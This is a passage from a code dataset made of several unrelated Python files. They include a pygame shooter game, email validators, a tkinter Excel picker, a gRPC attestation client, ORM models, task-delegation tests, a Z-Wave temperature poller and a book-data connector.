import randint\nimport time\npygame.font.init()\n\n# Dimensiones de la pantalla\nANCHO = 800\nALTO = 600\n# Colores\nBLANCO = (255, 255, 255) # R,G,B en el rango [0,255], 0 ausencia de color, 255 toda la intensidad\nVERDE_BANDERA = (27, 94, 32) # un poco de rojo, más de verde, un poco de azul\nROJO = (255, 0, 0) # solo rojo, nada de verde, nada de azul\nAZUL = (0, 0, 255) # nada de rojo, ni verde, solo azul\nNEGRO = (0, 0, 0)\n\n#Estado\nMENU = 1\nJUGANDO = 2\nPIERDE=4\nGANA=3\n\n\n# Estructura básica de un programa que usa pygame para dibujar\ndef dibujarPersonaje(ventana, spritePersonaje):\n ventana.blit(spritePersonaje.image, spritePersonaje.rect)\n\n\ndef dibujarEnemigos2(ventana, listaEnemigos2):\n for enemigo2 in listaEnemigos2:\n ventana.blit(enemigo2.image, enemigo2.rect)\n\ndef moverEnemigos2(listaEnemigos2):\n for enemigos2 in listaEnemigos2:\n enemigos2.rect.left -= 1\n\n\ndef dibujarEnemigos(ventana, listaEnemigos):\n for enemigo in listaEnemigos:\n ventana.blit(enemigo.image, enemigo.rect)\n\ndef moverEnemigos(listaEnemigos):\n for enemigos in listaEnemigos:\n enemigos.rect.left -= 1\n\n\ndef dibujarBalas(ventana, listaBalas):\n for bala in listaBalas:\n ventana.blit(bala.image, bala.rect)\n\n\ndef moverBalas(listaBalas):\n for bala in listaBalas:\n bala.rect.left += 30\n\n\n\ndef dibujarMenu(ventana, btnPlay):\n ventana.blit(btnPlay,(300,225)) #medidas btn\n\n\n\ndef dibujarMarcador(ventana, marcador, fuente):\n texto = fuente.render(\"Puntos: \"+ str(marcador), 1, ROJO) #antialiasing suaviza orilla, texto ya es imagen\n ventana.blit(texto, (50,50)) #dupla de cordenadas\n\n\n\ndef verificarColision(listaEnemigos, listaBalas):\n for bala in listaBalas:\n for enemigo in listaEnemigos: #Recorrer con INDICES\n #bala vs enemigo\n xb = bala.rect.left\n yb = bala.rect.bottom\n xe = enemigo.rect.left\n ye = enemigo.rect.bottom\n ae = enemigo.rect.width\n alte = enemigo.rect.height\n if xb >= xe and xb <= xe + ae and yb >= ye and yb <= ye + alte:\n #Golpeo al enemigo\n listaEnemigos.remove(enemigo)\n break\n\ndef checharColisionNave(listaEnemigos2, spritePersonaje, estado):\n destruido = False\n for bala in listaEnemigos2:\n\n #bala vs enemigo\n xb = bala.rect.left\n yb = bala.rect.bottom\n xe = spritePersonaje.rect.left\n ye = spritePersonaje.rect.bottom\n ae = spritePersonaje.rect.width\n alte = spritePersonaje.rect.height\n if xb >= xe and xb <= xe + ae and yb >= ye and yb <= ye + alte:\n #Golpeo al enemigo\n destruido = True\n break\n return destruido\n\ndef dibujar():\n score = 0\n imgGANA = pygame.image.load(\"imgGANA.jpg\")\n imgPIERDE = pygame.image.load(\"imgPIERDE.jpg\")\n fuente = pygame.font.SysFont(\"monospace\", 76)\n # Inicializa el motor de pygame\n pygame.init()\n # Crea una ventana de ANCHO x ALTO\n ventana = pygame.display.set_mode((ANCHO, ALTO)) # Crea la ventana donde dibujará\n reloj = pygame.time.Clock() # Para limitar los fps\n termina = False # Bandera para saber si termina la ejecución, iniciamos suponiendo que no\n\n imgPersonaje = pygame.image.load(\"nave.png\")\n spritePersonaje = pygame.sprite.Sprite()\n spritePersonaje.image = imgPersonaje\n spritePersonaje.rect = imgPersonaje.get_rect()\n spritePersonaje.rect.left = 0\n spritePersonaje.rect.bottom = ALTO // 2 + spritePersonaje.rect.height // 2\n\n\n\n listaEnemigos2 = []\n imgEnemigo2 = pygame.image.load(\"enemigo2.png\")\n\n\n listaEnemigos = []\n imgEnemigo = pygame.image.load(\"enemigo1.png\")\n\n\n\n listaBalas = []\n imgBala = pygame.image.load(\"bala.png\")\n estado = MENU\n\n #Menú\n imgBtnJugar 
= pygame.image.load(\"botonPlay.png\")\n\n #Fondo\n imgFondo = pygame.image.load(\"fondo.png\")\n\n # Tiempo\n timer = 0 # Acumulador de tiempo\n # Audio\n pygame.mixer.init()\n #pygame.mixer.music.load(\"shoot.wav\")\n #pygame.mixer.music.play(-1)\n efecto = pygame.mixer.Sound(\"shoot.wav\")\n\n while not termina: # Ciclo principal, MIENTRAS la variable termina sea False, el ciclo se repite automáticamente\n # Procesa los eventos que recibe\n for evento in pygame.event.get():\n if evento.type == pygame.QUIT: # El usuario hizo click en el botón de salir\n termina = True # Queremos terminar el ciclo\n elif evento.type == pygame.KEYDOWN:\n if evento.key == pygame.K_UP:\n spritePersonaje.rect.bottom -= 10\n elif evento.key == pygame.K_DOWN:\n spritePersonaje.rect.bottom += 10\n elif evento.key == pygame.K_z:\n spriteBala = pygame.sprite.Sprite()\n spriteBala.image = imgBala\n spriteBala.rect = imgBala.get_rect()\n spriteBala.rect.left = spritePersonaje.rect.left + spritePersonaje.rect.width\n spriteBala.rect.bottom = spritePersonaje.rect.bottom\n listaBalas.append(spriteBala)\n print(len(listaBalas))\n elif evento.type == pygame.MOUSEBUTTONUP:\n xm, ym = pygame.mouse.get_pos() #valores de dubla\n print(xm, \", \", ym)\n xb = ANCHO//2-128\n yb = ALTO//3\n if xm > xb and xm <= xb + 256 and ym >= yb and ym <= yb + 100:\n estado = JUGANDO\n\n\n # Borrar pantalla\n ventana.fill(NEGRO)\n\n if estado == JUGANDO:\n\n\n\n #Tiempo\n if timer >= 1:\n timer = 0\n # Crear una bala\n efecto.play()\n spriteBala = pygame.sprite.Sprite()\n spriteBala.image = imgBala\n spriteBala.rect = imgBala.get_rect()\n spriteBala.rect.left = spritePersonaje.rect.left + spritePersonaje.rect.width\n spriteBala.rect.bottom = spritePersonaje.rect.bottom\n listaBalas.append(spriteBala)\n # ENEMIGOS1\n spriteEnemigo = pygame.sprite.Sprite()\n spriteEnemigo.image = imgEnemigo\n spriteEnemigo.rect = imgEnemigo.get_rect()\n spriteEnemigo.rect.left = randint(0, ANCHO) + ANCHO\n spriteEnemigo.rect.bottom = randint(0, ALTO)\n listaEnemigos.append(spriteEnemigo)\n\n ## ENEMIGOS2\n spriteEnemigo2 = pygame.sprite.Sprite()\n spriteEnemigo2.image = imgEnemigo2\n spriteEnemigo2.rect = imgEnemigo2.get_rect()\n spriteEnemigo2.rect.left = randint(0, ANCHO) + ANCHO\n spriteEnemigo2.rect.bottom = randint(0, ALTO)\n listaEnemigos2.append(spriteEnemigo2)\n\n #Actualizar enemigos\n moverEnemigos(listaEnemigos)\n moverEnemigos2(listaEnemigos2)\n moverBalas(listaBalas)\n verificarColision(listaEnemigos, listaBalas)\n\n\n\n\n\n\n if(checharColisionNave(listaEnemigos2, spritePersonaje, estado) == True):\n estado=PIERDE\n # Dibujar, aquí haces todos los trazos que requieras\n # Normalmente llamas a otra función y le pasas -ventana- como parámetro, por ejemplo, dibujarLineas(ventana)\n # Consulta https://www.pygame.org/docs/ref/draw.html para ver lo que puede hacer draw\n ventana.blit(imgFondo, (0, 0))\n dibujarPersonaje(ventana, spritePersonaje)\n dibujarEnemigos(ventana, listaEnemigos)\n dibujarEnemigos2(ventana, listaEnemigos2)\n dibujarBalas(ventana, listaBalas)\n tiempo = pygame.time.get_ticks()\n score = tiempo\n if tiempo>120000:\n estado=PIERDE\n\n elif estado == MENU:\n #Dinujar menú\n dibujarMenu(ventana, imgBtnJugar)\n\n elif estado == PIERDE:\n ventana.blit(imgPIERDE, (0, 0))\n\n texto = fuente.render(\"Score:\"+str(score/1000), 4, BLANCO)\n ventana.blit(texto, (ANCHO // 2 - 200, ALTO // 4))\n\n\n elif estado == GANA:\n ventana.blit(imgGANA, (0, 0))\n texto = fuente.render(\"¡GANASTE!\", 4, BLANCO)\n ventana.blit(texto, (ANCHO // 2 - 200, 
ALTO // 4))\n\n\n\n\n\n\n\n        pygame.display.flip() # Actualiza trazos (Si no llamas a esta función, no se dibuja)\n        reloj.tick(60) # 40 fps\n        timer += 1/60\n\n    # Después del ciclo principal\n    pygame.quit() # termina pygame\n\n\n# Función principal, aquí resuelves el problema\ndef main():\n    dibujar() # Por ahora, solo dibuja\n\n# Llamas a la función principal\nmain()","sub_path":"juego/Juegoberny.py","file_name":"Juegoberny.py","file_ext":"py","file_size_in_byte":8813,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"1"} +{"seq_id":"102115801","text":"def validate_emails(email, col, index):\n    try:\n        valid = validate_email(email)\n        email = valid.email\n    except EmailNotValidError as e:\n        logging.error(f\"Index: {index}, Column: {col}, Not a valid email address.\")\n\n\n\n\ndef validate_email(email, col, index):\n    is_valid_email = bool(re.search(r\"^[\\w\\.\\+\\-]+\\@[\\w]+\\.[a-z]{2,3}$\", email))\n\n    if not is_valid_email:\n        logging.error(f\"Index: {index}, Column: {col}, Not a valid email address.\")\n\n\nsubset_cols = [\"Agent Last Name\", \"Agent Middle Name\", \"Agent First Name\",\n               \"Agent Writing Contract Start Date\", \"Date when an agent became A2O\"]\n","sub_path":"week_2/weekend/archive/archive.py","file_name":"archive.py","file_ext":"py","file_size_in_byte":624,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"1"} +{"seq_id":"82407409","text":"#!/usr/bin/env python3\n# -*- coding: utf-8 -*-\n\n# for creating/writing Excel files (supports the 2007+ format)\nfrom openpyxl import Workbook\n# for reading Excel files (supports the 2007+ format)\nfrom openpyxl import load_workbook\nimport tkinter.filedialog as filedialog\nfrom tkinter import *\nimport os\n\ndef readexcel(path):\n    wb=load_workbook(path)\n    #print(wb)\n    #print(wb.get_sheet_names())\n    ws = wb['工作表1']\n    l = []\n    \n    for n in ws.values:\n        l.append(list(n))\n    \n    return l\n\ndef callback(entry):\n    entry.delete(0,END) # clear the contents of the entry\n    #listbox_filename.delete(0,END)\n    # use the filedialog module's askopenfilename() to pick a file\n    filepath = filedialog.askopenfilename()\n    if filepath:\n        entry.insert(0,filepath) # insert the chosen path into the entry\n        print (filepath)\n    return filepath\n#getdir(filepath)\n\ndef getdir(filepath=os.getcwd()):\n    \"\"\"\n    Get the list of files under the given directory\n    \"\"\"\n    cf = os.listdir(filepath)\n    for i in cf:\n        listbox_filename.insert(END,i)\n\nif __name__ == \"__main__\":\n    root = Tk()\n    root.title(\"测试版本\")\n    root.geometry(\"600x400\")\n    root.rowconfigure(1, weight=1)\n    root.rowconfigure(2, weight=1)\n    \n    entry1 = Entry(root, width=60)\n    entry1.grid(sticky=W+N, row=0, column=0, columnspan=4, padx=5, pady=5)\n    \n    button1 = Button(root,text=\"选择文件\",command = lambda: callback(entry1))\n    button1.grid(sticky=W+N, row=1, column=0, padx=5, pady=5)\n    \n    entry2 = Entry(root, width=60)\n    entry2.grid(sticky=W+N, row=2, column=0, columnspan=4, padx=5, pady=5)\n    \n    button2 = Button(root,text=\"选择文件\",command = lambda: callback(entry2))\n    button2.grid(sticky=W+N, row=3, column=0, padx=5, pady=5)\n    # create a listbox to display all file names\n    \n    root.mainloop()\n    \n    '''\n    readpath = \"./data2/octane.xlsx\"\n    a = readexcel(readpath)\n    print(a)\n    '''\n","sub_path":"bplib_2/exl.py","file_name":"exl.py","file_ext":"py","file_size_in_byte":1885,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"1"} +{"seq_id":"643669985","text":"import grpc\n\nimport secretsharing_pb2 as s_shr_pb\nimport secretsharing_pb2_grpc as s_shr_grpc\n\nimport jwt\nfrom jwt.algorithms import RSAAlgorithm\n\nfrom cryptography import x509\nfrom cryptography.hazmat.backends import 
default_backend\n\nimport requests\nimport json\n\ndef reformat_pem_key(key):\n    formatted = \"-----BEGIN CERTIFICATE-----\\n%s\\n-----END CERTIFICATE-----\\n\" % key\n    print(formatted)\n    return formatted\n    \ndef check_jwt_signature(jwt_token):\n    url = 'https://aas.us.attest.azure.net/certs'\n    response = requests.get(url).json()\n    keys = response['keys']\n    certs = dict()\n    for jwk in keys:\n        kid = jwk['kid']\n        certs[kid] = jwk['x5c']\n    kid = jwt.get_unverified_header(jwt_token)['kid']\n\n    pem_data = reformat_pem_key(certs[kid][0])\n    key_ascii = pem_data.encode('ascii')\n    cert = x509.load_pem_x509_certificate(key_ascii, default_backend())\n    public_key = cert.public_key()\n\n    payload = jwt.decode(jwt_token, key=public_key, algorithms=['RS256'])\n    print(json.dumps(payload, indent=2))\n\ndef run():\n    with grpc.insecure_channel(target='localhost:5000',\n                               options=[('grpc.enable_retries', 0),\n                                        ('grpc.keepalive_timeout_ms', 100)\n                               ]) as channel:\n        stub = s_shr_grpc.SecretSharingStub(channel)\n        response = stub.GetAttestation(\n            s_shr_pb.AttestationRequest(cmd=s_shr_pb.CommandRequest.ATTESTATION))\n        if response.ok:\n            print(\"Get Attestation response: %s\" % response.msg)\n            check_jwt_signature(response.token)\n        else:\n            print(\"Get Attestation failed with message: %s\" % response.msg)\n\nif __name__ == '__main__':\n    run()\n","sub_path":"one_enclave/client/client.py","file_name":"client.py","file_ext":"py","file_size_in_byte":1722,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"1"} +{"seq_id":"364608848","text":"#!/usr/bin/python\n\"\"\"AToolProposal links Proposals and AnalyticalTools objects.\"\"\"\nfrom peewee import ForeignKeyField, CompositeKey, Expression, OP, unicode_type\nfrom metadata.orm.base import DB\nfrom metadata.orm.utils import index_hash\nfrom metadata.orm.proposals import Proposals\nfrom metadata.orm.analytical_tools import AnalyticalTools\nfrom metadata.rest.orm import CherryPyAPI\n\n\nclass AToolProposal(CherryPyAPI):\n    \"\"\"\n    AToolProposal attributes are foreign keys.\n\n    Attributes:\n        +-------------------+-------------------------------------+\n        | Name              | Description                         |\n        +===================+=====================================+\n        | proposal          | Link to the Proposals model         |\n        +-------------------+-------------------------------------+\n        | analytical_tool   | Link to the AnalyticalTools model   |\n        +-------------------+-------------------------------------+\n    \"\"\"\n\n    proposal = ForeignKeyField(Proposals, related_name='atools')\n    analytical_tool = ForeignKeyField(AnalyticalTools, related_name='proposals')\n\n    # pylint: disable=too-few-public-methods\n    class Meta(object):\n        \"\"\"PeeWee meta class contains the database and the primary key.\"\"\"\n\n        database = DB\n        primary_key = CompositeKey('analytical_tool', 'proposal')\n    # pylint: enable=too-few-public-methods\n\n    @staticmethod\n    def elastic_mapping_builder(obj):\n        \"\"\"Build the elasticsearch mapping bits.\"\"\"\n        super(AToolProposal, AToolProposal).elastic_mapping_builder(obj)\n        obj['proposal_id'] = {'type': 'text', 'fields': {'keyword': {'type': 'keyword', 'ignore_above': 256}}}\n        obj['analytical_tool_id'] = {'type': 'integer'}\n\n    def to_hash(self, recursion_depth=1):\n        \"\"\"Convert the object to a hash.\"\"\"\n        obj = super(AToolProposal, self).to_hash(recursion_depth)\n        obj['_id'] = index_hash(unicode_type(self.proposal.id),\n                                int(self.analytical_tool.id))\n        obj['proposal_id'] = unicode_type(self.proposal.id)\n        obj['analytical_tool_id'] = int(self.analytical_tool.id)\n        
return obj\n\n def from_hash(self, obj):\n \"\"\"Convert the hash into the object.\"\"\"\n super(AToolProposal, self).from_hash(obj)\n if 'proposal_id' in obj:\n self.proposal = Proposals.get(Proposals.id == obj['proposal_id'])\n if 'analytical_tool_id' in obj:\n self.analytical_tool = AnalyticalTools.get(\n AnalyticalTools.id == obj['analytical_tool_id']\n )\n\n def where_clause(self, kwargs):\n \"\"\"Where clause for the various elements.\"\"\"\n where_clause = super(AToolProposal, self).where_clause(kwargs)\n if 'proposal_id' in kwargs:\n prop = Proposals.get(Proposals.id == kwargs['proposal_id'])\n where_clause &= Expression(AToolProposal.proposal, OP.EQ, prop)\n if 'analytical_tool_id' in kwargs:\n atool = AnalyticalTools.get(AnalyticalTools.id == kwargs['analytical_tool_id'])\n where_clause &= Expression(AToolProposal.analytical_tool, OP.EQ, atool)\n return where_clause\n","sub_path":"metadata/orm/atool_proposal.py","file_name":"atool_proposal.py","file_ext":"py","file_size_in_byte":3192,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"1"} +{"seq_id":"564512792","text":"from ftw.testbrowser import browsing\nfrom ftw.testbrowser.pages import statusmessages\nfrom opengever.ogds.base.utils import get_current_org_unit\nfrom opengever.task.browser.delegate.vocabulary import attachable_documents_vocabulary\nfrom opengever.testing import IntegrationTestCase\nfrom plone import api\nfrom zope.app.intid.interfaces import IIntIds\nfrom zope.component import getUtility\n\n\nclass TestDelegateTaskToInbox(IntegrationTestCase):\n\n @browsing\n def test_delegate_to_inbox(self, browser):\n self.login(self.secretariat_user, browser)\n\n browser.open(self.task,\n view='@@task_transition_controller',\n data={'transition': 'task-transition-delegate'})\n\n form = browser.find_form_by_field('Responsibles')\n form.find_widget('Responsibles').fill(\n ['inbox:{}'.format(get_current_org_unit().id())])\n browser.css('#form-buttons-save').first.click() # can't use submit()\n\n form = browser.find_form_by_field('Issuer')\n form.find_widget('Issuer').fill(self.dossier_responsible.getId())\n\n browser.css('#form-buttons-save').first.click() # can't use submit()\n\n self.assertEqual(['1 subtasks were created.'],\n statusmessages.info_messages())\n\n\nclass TestDelegateTaskForm(IntegrationTestCase):\n\n @browsing\n def test_delegate_creates_subtask(self, browser):\n self.login(self.regular_user, browser=browser)\n\n browser.open(self.task, view='delegate_recipients')\n\n # step 1\n form = browser.find_form_by_field('Responsibles')\n form.find_widget('Responsibles').fill(self.dossier_responsible)\n browser.css('#form-buttons-save').first.click()\n\n # step 2\n browser.css('#form-buttons-save').first.click()\n\n self.assertEqual(['1 subtasks were created.'],\n statusmessages.info_messages())\n\n subtask = self.task.objectValues()[-1]\n self.assertEqual(self.task.title, subtask.title)\n self.assertEqual('robert.ziegler', subtask.responsible)\n self.assertEqual('fa', subtask.responsible_client)\n self.assertEqual('task-state-open', api.content.get_state(subtask))\n self.assertEqual('task-15', subtask.id)\n\n @browsing\n def test_delegate_does_not_set_documents_attribute_on_subtask(self, browser):\n self.login(self.regular_user, browser=browser)\n\n browser.open(self.task, view='delegate_recipients')\n\n # step 1\n form = browser.find_form_by_field('Responsibles')\n form.find_widget('Responsibles').fill(self.dossier_responsible)\n browser.css('#form-buttons-save').first.click()\n\n # 
step 2\n browser.css('#form-buttons-save').first.click()\n\n subtask = self.task.objectValues()[-1]\n self.assertFalse(\n hasattr(subtask, 'documents'),\n 'The transition-extender should not pass the documents-property to the dexterity createContent method.'\n )\n\n @browsing\n def test_issuer_is_prefilled_with_current_user(self, browser):\n self.login(self.regular_user, browser=browser)\n\n browser.open(self.task, view='delegate_recipients')\n\n form = browser.find_form_by_field('Responsibles')\n form.find_widget('Responsibles').fill(self.dossier_responsible)\n browser.css('#form-buttons-save').first.click()\n\n self.assertEqual(\n self.regular_user.getId(), browser.find('Issuer').value)\n\n @browsing\n def test_responsible_is_required(self, browser):\n self.login(self.regular_user, browser=browser)\n\n browser.open(self.task, view='delegate_recipients')\n browser.css('#form-buttons-save').first.click()\n\n self.assertEqual(\n ['Required input is missing.'],\n browser.css('#formfield-form-widgets-responsibles .error').text)\n\n @browsing\n def test_teams_are_selectable_as_responsible(self, browser):\n self.login(self.regular_user, browser=browser)\n\n browser.open(self.task, view='delegate_recipients')\n\n form = browser.find_form_by_field('Responsibles')\n form.find_widget('Responsibles').fill(['team:1'])\n browser.css('#form-buttons-save').first.click() # can't use submit()\n\n form = browser.find_form_by_field('Issuer')\n form.find_widget('Issuer').fill(self.dossier_responsible.getId())\n browser.css('#form-buttons-save').first.click() # can't use submit()\n\n self.assertEqual(\n ['1 subtasks were created.'], statusmessages.info_messages())\n\n\nclass TestAttachableDocumentsVocabulary(IntegrationTestCase):\n\n def test_attachable_documents_vocabulary_lists_contained_and_related_documents(self):\n self.login(self.regular_user)\n intids = getUtility(IIntIds)\n terms = attachable_documents_vocabulary(self.task)\n\n self.assertItemsEqual(\n [el.UID() for el in [self.document, self.taskdocument]],\n [term.token for term in terms])\n self.assertItemsEqual(\n [str(intids.getId(el)) for el in [self.document, self.taskdocument]],\n [term.value for term in terms])\n","sub_path":"opengever/task/tests/test_delegate.py","file_name":"test_delegate.py","file_ext":"py","file_size_in_byte":5155,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"1"} +{"seq_id":"194158180","text":"import time\nimport httplib2\nimport json\n\n# Conifguration Record,\n# Device Id (Assigned manually)\n# Device Type (S = Switch, T = Temp sensor)\n# Device Number (Assigned by Server)\n# Device Instance\n# Device Name\n\niSleepTime = 10\n\n#sFileName = \"/mnt/nas/temp.inf\"\n#sStopFileName = \"/mnt/nas/stop.yes\"\n#sDeviceConfigFileName = \"config.txt\"\n\n#sFileName = \"temp.inf\"\n#sDeviceConfigFileName = \"config.txt\"\n#sStopFileName = \"stop.yes\"\nsServerAddress = \"192.168.0.79:8083\"\n\nh = httplib2.Http()\n\n\ndef compile_httprefresh(iDeviceNum, iDeviceInstance):\n sOutBuf = \"http://\" + sServerAddress + \"/ZWaveAPI/Run/devices[\" + str(iDeviceNum)\n sOutBuf = sOutBuf + \"].instances[\" + str(iDeviceInstance) + \"].commandClasses[0x25].Get()\"\n return sOutBuf\n\ndef compile_httpgettemp(IDeviceNum, ICmdClass):\n sOutBuf = \"http://192.168.0.79:8083/ZWaveAPI/Run/devices[\" + str(IDeviceNum)\n sOutBuf = sOutBuf + \"].instances[0].commandClasses[\" + str(ICmdClass)\n sOutBuf = sOutBuf + \"].data.level.value\"\n# sOutBuf = sOutBuf +\"].Get()\"\n# sOutBuf = sOutBuf + \"].data[1]\"\n 
return sOutBuf\n\ndef get_currenttemp(iDeviceNum, iDeviceInstance):\n print(\"Run Refresh --->\")\n# resp, content = h.request(compile_httprefresh(iDeviceNum, iDeviceInstance), \"GET\")\n# print(resp,\"\\n\")\n# print(content,\"\\n\")\n# print(\"Run Get --->\")\n resp, content = h.request(compile_httpgettemp(iDeviceNum, 49), \"GET\")\n# print(resp,\"\\n\")\n print(content,\"\\n\")\n# try:\n# DDevInfo = json.loads(content.decode('ascii'))\n# return DDevInfo\n# except (ValueError):\n# return \"\"\n return \"\"\n \ndef get_currenttime(DDevInfo):\n return DDevInfo[\"updateTime\"]\n\ndef get_openfile(SFileName):\n try:\n tobj = open(SFileName, \"r\")\n tobj.close()\n return True\n except (IOError, TypeError):\n return False\n\nStopRun = False\n\nprint(\"Application started !\\n\")\n\nwhile StopRun == False:\n\n# fConfFile = open(sDeviceConfigFileName, \"r\")\n# fObiS = open(sFileName, \"a\")\n\n# for sLine in fConfFile:\n\n# rConfigRecord = sLine.split(\",\")\n \n# iDeviceId = int(rConfigRecord[0])\n# sDeviceType = rConfigRecord[1].strip()\n# iDeviceNum = int(rConfigRecord[2])\n# iDeviceInst = int(rConfigRecord[3])\n# sDeviceName = rConfigRecord[4].strip()\n\n# if sDeviceType == \"T\":\n sDevResp = get_currenttemp(12, 0)\n print(\"sDevResp :\", sDevResp)\n# if sDevResp != \"\":\n# sDevTemp = sDevResp\n# sRequestTime = time.ctime(time.time())\n# print(\"Device :\", str(iDeviceNum), \":\", sDeviceName, \"- Time :\", sRequestTime, \"- Temparatur : \", sDevTemp)\n# fObiS.write(\"{}, {}, {}\\n\".format(str(iDeviceNum), sRequestTime, sDevTemp))\n# else:\n# print(\"Value Error thrown - \", time.ctime(time.time()))\n# fObiS.write(\"{} {}\\n\".format(\"Value erroro at :\", time.ctime(time.time())))\n\n# fObiS.close()\n# fConfFile.close()\n\n time.sleep(iSleepTime)\n# StopRun = get_openfile(sStopFileName) \n\nprint(\"\\nApplication halted !\\n\")\n","sub_path":"homeautomation/python/Archive/read_analog_v0.1.py","file_name":"read_analog_v0.1.py","file_ext":"py","file_size_in_byte":3086,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"1"} +{"seq_id":"623995207","text":"''' functionality outline for a book data connector '''\nfrom abc import ABC, abstractmethod\nfrom dataclasses import dataclass\nimport pytz\nfrom urllib3.exceptions import RequestError\n\nfrom django.db import transaction\nfrom dateutil import parser\nimport requests\nfrom requests import HTTPError\nfrom requests.exceptions import SSLError\n\nfrom bookwyrm import models\n\n\nclass ConnectorException(HTTPError):\n ''' when the connector can't do what was asked '''\n\n\nclass AbstractMinimalConnector(ABC):\n ''' just the bare bones, for other bookwyrm instances '''\n def __init__(self, identifier):\n # load connector settings\n info = models.Connector.objects.get(identifier=identifier)\n self.connector = info\n\n # the things in the connector model to copy over\n self_fields = [\n 'base_url',\n 'books_url',\n 'covers_url',\n 'search_url',\n 'max_query_count',\n 'name',\n 'identifier',\n 'local'\n ]\n for field in self_fields:\n setattr(self, field, getattr(info, field))\n\n def search(self, query, min_confidence=None):\n ''' free text search '''\n resp = requests.get(\n '%s%s' % (self.search_url, query),\n headers={\n 'Accept': 'application/json; charset=utf-8',\n },\n )\n if not resp.ok:\n resp.raise_for_status()\n data = resp.json()\n results = []\n\n for doc in self.parse_search_data(data)[:10]:\n results.append(self.format_search_result(doc))\n return results\n\n @abstractmethod\n def 
get_or_create_book(self, remote_id):\n ''' pull up a book record by whatever means possible '''\n\n @abstractmethod\n def parse_search_data(self, data):\n ''' turn the result json from a search into a list '''\n\n @abstractmethod\n def format_search_result(self, search_result):\n ''' create a SearchResult obj from json '''\n\n\nclass AbstractConnector(AbstractMinimalConnector):\n ''' generic book data connector '''\n def __init__(self, identifier):\n super().__init__(identifier)\n\n self.key_mappings = []\n\n # fields we want to look for in book data to copy over\n # title we handle separately.\n self.book_mappings = []\n\n\n def is_available(self):\n ''' check if you're allowed to use this connector '''\n if self.max_query_count is not None:\n if self.connector.query_count >= self.max_query_count:\n return False\n return True\n\n\n def get_or_create_book(self, remote_id):\n # try to load the book\n book = models.Book.objects.select_subclasses().filter(\n origin_id=remote_id\n ).first()\n if book:\n if isinstance(book, models.Work):\n return book.default_edition\n return book\n\n # no book was found, so we start creating a new one\n data = get_data(remote_id)\n\n work = None\n edition = None\n if self.is_work_data(data):\n work_data = data\n # if we requested a work and there's already an edition, we're set\n work = self.match_from_mappings(work_data, models.Work)\n if work and work.default_edition:\n return work.default_edition\n\n # no such luck, we need more information.\n try:\n edition_data = self.get_edition_from_work_data(work_data)\n except KeyError:\n # hack: re-use the work data as the edition data\n # this is why remote ids aren't necessarily unique\n edition_data = data\n else:\n edition_data = data\n edition = self.match_from_mappings(edition_data, models.Edition)\n # no need to figure out about the work if we already know about it\n if edition and edition.parent_work:\n return edition\n\n # no such luck, we need more information.\n try:\n work_data = self.get_work_from_edition_date(edition_data)\n except KeyError:\n # remember this hack: re-use the work data as the edition data\n work_data = data\n\n if not work_data or not edition_data:\n raise ConnectorException('Unable to load book data: %s' % remote_id)\n\n # at this point, we need to figure out the work, edition, or both\n # atomic so that we don't save a work with no edition for vice versa\n with transaction.atomic():\n if not work:\n work_key = self.get_remote_id_from_data(work_data)\n work = self.create_book(work_key, work_data, models.Work)\n\n if not edition:\n ed_key = self.get_remote_id_from_data(edition_data)\n edition = self.create_book(ed_key, edition_data, models.Edition)\n edition.parent_work = work\n edition.save()\n work.default_edition = edition\n work.save()\n\n # now's our change to fill in author gaps\n if not edition.authors.exists() and work.authors.exists():\n edition.authors.set(work.authors.all())\n edition.author_text = work.author_text\n edition.save()\n\n if not edition:\n raise ConnectorException('Unable to create book: %s' % remote_id)\n\n return edition\n\n\n def create_book(self, remote_id, data, model):\n ''' create a work or edition from data '''\n book = model.objects.create(\n origin_id=remote_id,\n title=data['title'],\n connector=self.connector,\n )\n return self.update_book_from_data(book, data)\n\n\n def update_book_from_data(self, book, data, update_cover=True):\n ''' for creating a new book or syncing with data '''\n book = update_from_mappings(book, data, self.book_mappings)\n\n 
author_text = []\n for author in self.get_authors_from_data(data):\n book.authors.add(author)\n author_text.append(author.name)\n book.author_text = ', '.join(author_text)\n book.save()\n\n if not update_cover:\n return book\n\n cover = self.get_cover_from_data(data)\n if cover:\n book.cover.save(*cover, save=True)\n return book\n\n\n def update_book(self, book, data=None):\n ''' load new data '''\n if not book.sync and not book.sync_cover:\n return book\n\n if not data:\n key = getattr(book, self.key_name)\n data = self.load_book_data(key)\n\n if book.sync:\n book = self.update_book_from_data(\n book, data, update_cover=book.sync_cover)\n else:\n cover = self.get_cover_from_data(data)\n if cover:\n book.cover.save(*cover, save=True)\n\n return book\n\n\n def match_from_mappings(self, data, model):\n ''' try to find existing copies of this book using various keys '''\n relevent_mappings = [m for m in self.key_mappings if \\\n not m.model or model == m.model]\n for mapping in relevent_mappings:\n # check if this field is present in the data\n value = data.get(mapping.remote_field)\n if not value:\n continue\n\n # extract the value in the right format\n value = mapping.formatter(value)\n\n # search our database for a matching book\n kwargs = {mapping.local_field: value}\n match = model.objects.filter(**kwargs).first()\n if match:\n return match\n return None\n\n\n @abstractmethod\n def get_remote_id_from_data(self, data):\n ''' otherwise we won't properly set the remote_id in the db '''\n\n\n @abstractmethod\n def is_work_data(self, data):\n ''' differentiate works and editions '''\n\n\n @abstractmethod\n def get_edition_from_work_data(self, data):\n ''' every work needs at least one edition '''\n\n\n @abstractmethod\n def get_work_from_edition_date(self, data):\n ''' every edition needs a work '''\n\n\n @abstractmethod\n def get_authors_from_data(self, data):\n ''' load author data '''\n\n\n @abstractmethod\n def get_cover_from_data(self, data):\n ''' load cover '''\n\n @abstractmethod\n def expand_book_data(self, book):\n ''' get more info on a book '''\n\n\ndef update_from_mappings(obj, data, mappings):\n ''' assign data to model with mappings '''\n for mapping in mappings:\n # check if this field is present in the data\n value = data.get(mapping.remote_field)\n if not value:\n continue\n\n # extract the value in the right format\n try:\n value = mapping.formatter(value)\n except:\n continue\n\n # assign the formatted value to the model\n obj.__setattr__(mapping.local_field, value)\n return obj\n\n\ndef get_date(date_string):\n ''' helper function to try to interpret dates '''\n if not date_string:\n return None\n\n try:\n return pytz.utc.localize(parser.parse(date_string))\n except ValueError:\n pass\n\n try:\n return 